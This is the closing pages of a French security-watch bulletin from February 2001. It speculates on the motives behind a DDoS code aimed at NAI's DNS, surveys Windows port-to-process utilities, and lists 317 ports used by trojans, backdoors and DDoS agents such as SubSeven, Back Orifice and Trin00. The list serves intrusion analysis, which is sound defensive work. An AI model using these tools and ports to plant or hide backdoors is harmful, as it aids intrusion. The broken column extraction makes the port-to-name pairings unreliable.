directe
Shell
Code
Cible
indirecte
UDP/53
NAI
Fils
Nous pensons à la suite de l'analyse de ce code, et contrairement à ce qui a pu être annoncé, qu'il a volontairement
été conçu comme un vecteur d'attaque distribuée en déni de service initialisée par le système DNS cible de l'attaque.
L'auteur a ensuite codé, cela étant facile, une activation locale.
Une question reste ouverte quand à l'origine exacte de ce code visant explicitement une grande société de sécurité. De
notre point de vue, quatre hypothèses peuvent être proposées:
1.
Atteindre l'image de marque de NAI: Ce mobile est peu vraisemblable, l'effet escompté n'a pas été atteint car la
cible sélectionnée est un service Internet et non un produit ou développement NAI.
2.
Faire valoir une compétence: Ici encore, ce mobile ne tient pas, le code étant totalement anonyme et la source
réellement masquée.
3.
Préparer une attaque: La saturation du DNS de NAI peut être la phase préliminaire et nécessaire à la réalisation
d'une attaque à plus vaste échelle. La collaboration involontaire de plusieurs milliers de machines permet de
garantir la saturation d'un système performant. Cette hypothèse qui peut sembler 'tirée par les cheveux' nous
semble pourtant l'une des plus vraisemblables. En 1994, Kevin Mitnick a pénétré un système informatique en
saturant préalablement un serveur particulièrement bien choisi …
4.
Provoquer une réaction: La démonstration à large échelle de la vulnérabilité de l'INTERNET sur une cible
particulièrement bien choisie peut conduire à l'engagement d'actions jusqu'alors non prioritaires. En 1988, le vers
Morris, diffusé par le fils d'un grand responsable de la sécurité au sein d'une organisation gouvernementale
Américaine, a conduit à la création du CERT-US …
http://ids.securityportal.com/liste-archive/bugtraq/2001/Jan/0541.html (Archives alternatives de bugtraq contenant le code original)
http://fatty.opf.slu.cz/bugtraq/msg05887.html
(Archives alternatives de bugtraq contenant le code original)
IDENTIFICATION DES SERVICES
Description
Sous Windows, l'identification de l'application associée à un service TCP ou UDP ouvert n'est pas chose aisée: le
superbe utilitaire 'lsof' n'est disponible qu'en environnement UNIX. Si la plupart des logiciels de type 'pare-feu
personnel' offrent une fonctionnalité permettant d'identifier l'application à l'origine d'une connexion ou d'un service,
quelques outils simples peuvent cependant rendre de grands services:
Page 39/42
Février 2001
FportNG v1.33
Implémenté sous la forme d'une application
console fonctionnant en environnement NT et
2000, fPortNG est un utilitaire gratuit
proposé par le société FoundStone. Simple,
efficace, et de faible encombrement (2
fichiers de 141Ko au total). Divers autres
utilitaires gratuits dédiés à l'environnement
NT sont disponibles sur le site de cette
société dont:
- Fpipe v2.1, un redirecteur de port TCP/UDP
permettant de rediriger le trafic d'un port
sur un autre et ainsi éventuellement de
traverser un dispositif de sécurité,
- Fscan v1.12, un scanner de port TCP/UDP
utilisant le mode ligne de commande,
- SuperScan v3.0, l'un des scanners de port
en mode graphique les plus connus en
environnement Windows.
TcpView v1.11
Version évoluée et graphique de netstat,
TcpView v1.11 permet de visualiser
instantanément
l'état
des
connexions
TCP/UDP, le tout sous la forme d'un unique
exécutable de moins de 75Ko ! La version
payante, TcpView Pro (1.8Mo) permet de
visualiser
les
processus
associés
aux
connexions.
Le site 'sysinternals.com' offre par ailleurs de
très nombreux logiciels de surveillance dédiés
à l'environnement NT/2000:
- HandleEx v3.11, un utilitaire similaire à
'lsof'
permettant
de
visualiser
les
descripteurs et ressources ouvertes ainsi
que les applications associées,
- TDIMon v1.01, un outil de visualisation en
temps réel la sources et les paramètres des
requêtes effectuées sur TDI (Interface
Programmatique de Transport) et les
réponses associées.
http://www.foundstone.com/rdlabs/proddesc/fport.html
http://www.sysinternals.com/ntw2k/utilities.shtml
LA LISTE NON OFFICIELLE DES NUMEROS DE PORT TC/UDP
Description
Une compilation des numéros de ports utilisés par différents Maliciels - Chevaux de Troie, Vers, Portes dérobées
- est proposée sous la forme d'une liste classée par numéros de ports croissants. Cette liste, comportant 317 entrées,
résulte d'une compilation de différentes sources disponibles sur le WEB.
Ces informations sont fournies pour ce quelles valent, en tant qu'aide à l'analyse d'un problème de compromission ou
d'intrusion, mais sans garantie d'exactitude ou d'exhaustivité.
Attention, certains numéro de ports indiqués correspondent à un service normalisé - ie: port 21, Service TCP - mais
peuvent aussi être utilisés, notamment en environnement Windows™, par un Cheval de Troie ayant pris la place du
service.
2
21
22
23
31
41
48
50
58
79
80
81
99
110
113
Death
BladeRunner
Shaft
FireHacker
Master Paradise, Agent 31
Deep Throat
Drat
Drat
DM Setup
CDK, FireHotchker
AckCmd, BackEnd
RemoConChubo
Hidden port
ProMail Trojan
Invisible daemon
119
121
123
133
142
146
170
334
420
421
456
513
514
531
555
Happy99
BO, JammerKillahV
NetController
Farnaz
NetTaxi
Infector
A-Trojan
Backage
Breach
TCP Wrapper Trojan
Hackers Paradise
Grlogin
RPC Backdoor
Rasmin
StealthSpy, Phase0, NeTadmin
605
666
667
669
692
777
808
911
999
1000
1001
1010
1011
1012
1015
SecretService
Attack FTP
SniperNet
DP Trojan
GayOL
AimSpy, Undetected
WinHole
Dark Shadow
Deep Throat
Der Spaeher
Silencer, WebEx
Doly trojan v1.35
Doly Trojan
Doly Trojan
Doly trojan v1.5
Page 40/42
Février 2001
1016
1020
1024
1033
1042
1045
1049
1050
1054
1080
1081
1082
1083
1090
1095
1097
1098
1099
1170
1200
1201
1207
1212
1234
1243
1245
1255
1256
1269
1313
1338
1349
1492
1509
1524
1600
1777
1807
1966
1969
1981
1999
2000
2001
2023
2080
2115
2140
2155
2255
2283
2300
2339
2345
2565
2583
2600
2716
2773
2801
2989
3000
3024
3128
3129
3150
3456
3459
3700
3791
3801
4000
4092
4242
4321
4444
4567
4590
4950
5000
5001
Doly Trojan
Vampire
NetSpy
Netspy
BlaTrojan 1.1
Rasmin
/sbin/Initd
MiniCommand
AckCmd
Wingate, WinHole
WinHole
WinHole
WinHole
Xtreme
RAT
RAT
RAT
RAT, BloodFest
Streaming Audio Trojan
NoBackO (UDP)
NoBackO (UDP)
SoftWAR
Kaos
Ultors Trojan
SubSeven
Vodoo Doll
Scarab
Project Next
Maverick's Matrix
NETrojan
Millenium Worm
Bo DLL
FTP99CMP
aa
Trin00
Shiva Burka
Scarab
SpySender
Fake FFFFFFTP
OpC BO
ShockRave, Bowl
Backdoor
Der Spaeher, Insane
Der Spaeher, TrojanCow
Pass Ripper
WinHole
Bugs
The Invasor, DeepThroat (UDP)
Illusion Mailer
Nirvana
RAT 5
Xplorer
Voice Spy
Doly Trojan
Striker
Wincrash2
Digital RootBeer
The Prayer
SubSeven 2.1 Gold
Phineas
Rat (UDP)
Remote Shut
WinCrash
RingZero
Master Paradise
The Invasor, DeepThroat (UDP)
Terror Trojan
Eclipse2000, Sanctuary
Portal of Doom
Total Eclypse 1.0
Total Eclypse 1.0
SkyDance
WinCrash
Virtual Machine Hack
BoBo
Prosiak, Swift Remote
File Nail
IcqTrojan
IcqTrojan
Blazer5, Socket23
Back Door Setup, Socket23
5010
5011
5025
5031
5032
5321
5400
5401
5402
5512
5550
5555
5556
5569
5637
5638
5742
5760
5882
5888
6000
6006
6272
6400
6666
6667
6669
6670
6711
6712
6713
6723
6771
6776
6838
6883
6912
6939
6969
6970
7000
7301
7306
7307
7308
7424
7597
7777
7789
7983
8080
8787
8988
8989
9325
9400
9872
9873
9874
9875
9878
9989
10067
10085
10086
10101
10167
10520
10607
10666
11000
11050
11051
11223
12076
12223
12345
12346
12349
12361
12362
Solo
OOTLT + OOTLT Cart
WM Remote Keylogger
NetMetro 1.0
NetMetro 1.0
Firehotcker
BladeRunner, BackConst. 1.2
Illusion Mailer
Xtcp
ServeMe
BO Facility
RoboHack
PC Crasher
PC Crasher
Wincrash
Linux Portmap Remote root
Y3K RAT (UDP)
Y3K RAT
The tHing
Bad Blood
Secret Service
The tHing
NetBus Worm
Satan
Vampire
Deep Throath 1,2,3.x
SubSeven
SubSeven
SubSeven
MStream
Deep Throat
SubSeven
MStream (UDP)
DeltaSource
Shitheep
Indoctrination
Gatecrasher, Priority
Gatecrasher
Remote Grab, SubSeven Gold
Net Monitor
Net Monitor
Net Monitor
Net Monitor
Host Control
QaZ
Tini
ICQKiller
MStream
Brown Orifice, RingZero
BO2K
BacHack
Rcon, Xcon
MStream (UDP)
InCommand 1.0
Portal of Doom
Portal of Doom
Portal of Doom
Portal of Doom
TransScout
InIkiller
Portal of Doom
Syphillis
Syphillis
BrainSpy
Portal of Doom
Acid Shivers
Coma
Ambush (UDP)
Senna Spy Trojans
Host Control
Host Control
ProgenicTrojan
Gjamer
Hack´99 KeyLogger
Telnet Trojan
NetBus 1.x
BioNet
Whack-a-mole
Whack-a-mole (UDP)
12623
12624
12631
12701
12754
13000
13010
14500
15092
15104
15858
16484
16660
16772
16969
17166
17300
17449
17499
17777
18753
19864
20000
20001
20002
20023
20034
20203
20331
20432
20433
21554
22222
23005
23023
23032
23432
23456
23476
23477
26274
26681
27374
27444
27573
27665
29104
29891
30001
30003
30029
30100
30101
30102
30103
30133
30303
30947
30999
31335
31336
31337
31338
31339
31666
31785
31788
31789
31790
31791
31001
32100
32418
33270
33333
33577
33911
34324
34444
34555
35555
DUN Control (UDP)
Buttman
Whack Job
Eclipse 2000
MStream
Senna Spy
Hacker Brazil
PC Invader
Host Control
mStream
CDK
Mosucker
StrachelDraft
ICQ Revenge
Priority
Mosaic
Kuang2 theVirus
Kid Terror
Crazzy Net
Nephron
Shaft (UDP)
Icq Revenge
Millenium
Millenium
AcidkoR
VP Killer
NetBus 2 Pro
Logged!, Chupacabra
Bla
Shaft
Shaft (UDP)
GirlFriend, Schwindler 1.82
Prosiak 0.47
NetTrash
Logged!
Amanda
Asylum
Evil FTP, Whack Job
Donald Dick
Donald Dick
Delta Source (UDP)
Voice Spy
SubSeven, Ramen
Trin00 (UDP)
SubSeven
Trin00
NetTrojan
The Unexplained
ErrOr32
Lamer's Death
AOLTrojan1.1
NetSphere
NetSphere
NetSphere
NetSphere
NetSphere
Socket23
Intruse
Kuang2
Trin00
Butt Funnel
BackOriffice
DeepBO
NetSpy DK
BBBOWhack
Hack'a'tack
Hack'a'tack
Hack'a'tack (UDP)
Hack'a'tack
Hack'a'tack (UDP)
Donald Dick
Project Next, Peanut Brittle
Acid Battery
Trinity
Prosiak
PsychWard
Trojan Spirit 2001
Tiny Telnet Server, BigGluck
Donald Dick
Trin00 Windows (UDP)
Trin00 Windows (UDP)
Page 41/42
Février 2001
40412
40421
40422
40423
40425
40426
41666
44444
47262
50505
TheSpy
Master Paradise, Agent 40421
Master Paradise
Master Paradise
Master Paradise
Master Paradise
RBT
Prosiak
Delta Source (UDP)
Socket23
50766
51966
52317
53001
54283
54320
54321
57341
60000
60068
Fore, Schwindler
Cafeini
Acid Battery 2000
Remote Windows Shutdown
SubSeven
BO 2000
Schoolbus 1.6
NetRaider
Deep Throat
Xzip
61348
61466
61603
63485
64101
65000
65432
65534
65535
Bunker Hill
Telecommando
Bunker Hill
Bunker Hill
TaskMan
Devil 1.03
The Traitor
/sbin/Initd
RC1 Trojan
http://websites.ntl.com/~leo.filos/trojanh.htm
http://www.simovits.com/nyheter9902.html
http://www.clic.net/~hello/puppet/nnports.html
Page 42/42

Veille Technologique Sécurité

Transcription

Documents pareils

Veille Technologique Sécurité

Télécharger

format PDF - Michael Opdenacker

ADHESION D`UNE PERSONNE MORALE AU

Apogée TADELAKT

Fiche du prestataire FranceServ HÃ©bergement

developpeur en aplication web

CV Version PDF - Na

sécurité de votre entreprise : prenez le contrôle en toute - F

Veille Technologique Sécurité

Fiche Produit Cesi Entreprise